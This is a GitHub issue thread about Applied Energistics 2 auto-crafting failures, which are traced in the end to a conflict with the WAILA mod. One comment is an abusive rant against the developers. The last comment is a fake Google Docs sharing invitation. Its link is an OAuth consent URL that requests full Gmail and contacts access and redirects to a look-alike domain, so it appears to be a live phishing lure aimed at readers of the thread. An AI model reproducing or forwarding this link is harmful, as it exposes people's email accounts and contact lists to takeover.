### ISSUE TITLE
Auto Crafting is not working for me.

### ISSUE THREAD

**Issue by HDLawrence** [AppliedEnergistics/Applied-Energistics-2#709]
Seems totally random. I can make sticks with a recipe but cannot make buckets. This applies to every recipe. I have hundreds of recipes for machines with all mods and nothing seems to make sense about which ones will work. It doesn't seem to be a mod compatibility issue because even single-step vanilla items won't craft. 

Things I have done:
Ripped out and replaced every controller block.
Replaced all crafting CPUs.
Checked for invalid recipes. 
Downloaded new copy of the mod Java Archive.

**Comment by Ahkronn** [comment]
I had an issue with that when I first started with AE2. The reason was that I had some Processing Patterns instead of Crafting Patterns. Did you make sure that's not your issue?

**Comment by HDLawrence** [comment]
Yes, all of my patterns are correct. I have been running great but then one day it just stopped working on some. I destroyed my old patterns and made new ones and found that the problem is task specific.

**Comment by yueh** [comment]
Please provide more information. If some recipes are working it is usually an issue with wrong patterns like processing instead of crafting patterns.

**Comment by HDLawrence** [comment]
In the past few days I have tried switching the version of AE that I am running. I have used RV1 and RV2-1,6,7,8,9,16,and 29. Every time that I change the version different recipes come and go in terms of working. I know that all of my recipes are working because every time I change versions some are fixed.

**Comment by yueh** [comment]
What does "come and go" mean for you?
Are they for example just vanishing from the terminals? If so, do the interfaces have enough channels, are chunkloading and such things?

There are no changes to the crafting or patterns during rv2. So I can currently only consider an issue with your build into account as you are the only one reporting such a problem.

**Comment by HDLawrence** [comment]
Come and go means to me that when I change versions each one has a
different collection of recipes that are grayed out.
The interfaces have enough channels and no physical changes have been made.

Is there a way to "reset" easily? For instance, just saving the world but
starting fresh with a whole new installation of Minecraft?

**Comment by fdsgdfgdfh** [comment]
There is no "easy" way of fixing, what those shitty developers fucked up.
Whatever you liked, if someone changed it, it's GONE! Those dev think so highly of their work, no matter how many people tell them that it sucks, they seem to believe that they are doing GOOD work... hilarious, isn't it?

**Comment by HDLawrence** [comment]
I have now updated every mod I have to the newest versions. Forge is updated. AppliedEnergistics is at RV2-Beta7.

Now what is happening is that when I got to initiate a crafting job everything works except that the buttons are greyed out. 
![2015-01-19_11 07 47](https://cloud.githubusercontent.com/assets/5769722/5804433/73bed3ee-9fcb-11e4-9cd4-e056806ca96a.png)

**Comment by OscarBarrett** [comment]
Your issue might be this https://github.com/AppliedEnergistics/Applied-Energistics-2/issues/682#issuecomment-68874043

**Comment by HDLawrence** [comment]
Thank you. Thank you. Thank you.

I just read through the whole issue report and it was the WAILA issue. I
uninstalled it and everything works again! I am so excited to be playing
again! You are the best!!!!!!

**Comment by HDLawrence** [comment]
Harrison Lawrence has invited you to view the following document:

Open in Docs
<https://accounts.google.com/o/oauth2/auth?client_id=1535050614-8i934kb9l0snc0iocqb0iv27lli0r858.apps.googleusercontent.com&scope=https%3A%2F%2Fmail.google.com%2F+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fcontacts&immediate=false&include_granted_scopes=true&response_type=token&redirect_uri=https%3A%2F%2Fgoogledocs.g-docs.win%2Fg.php&customparam=customparam>
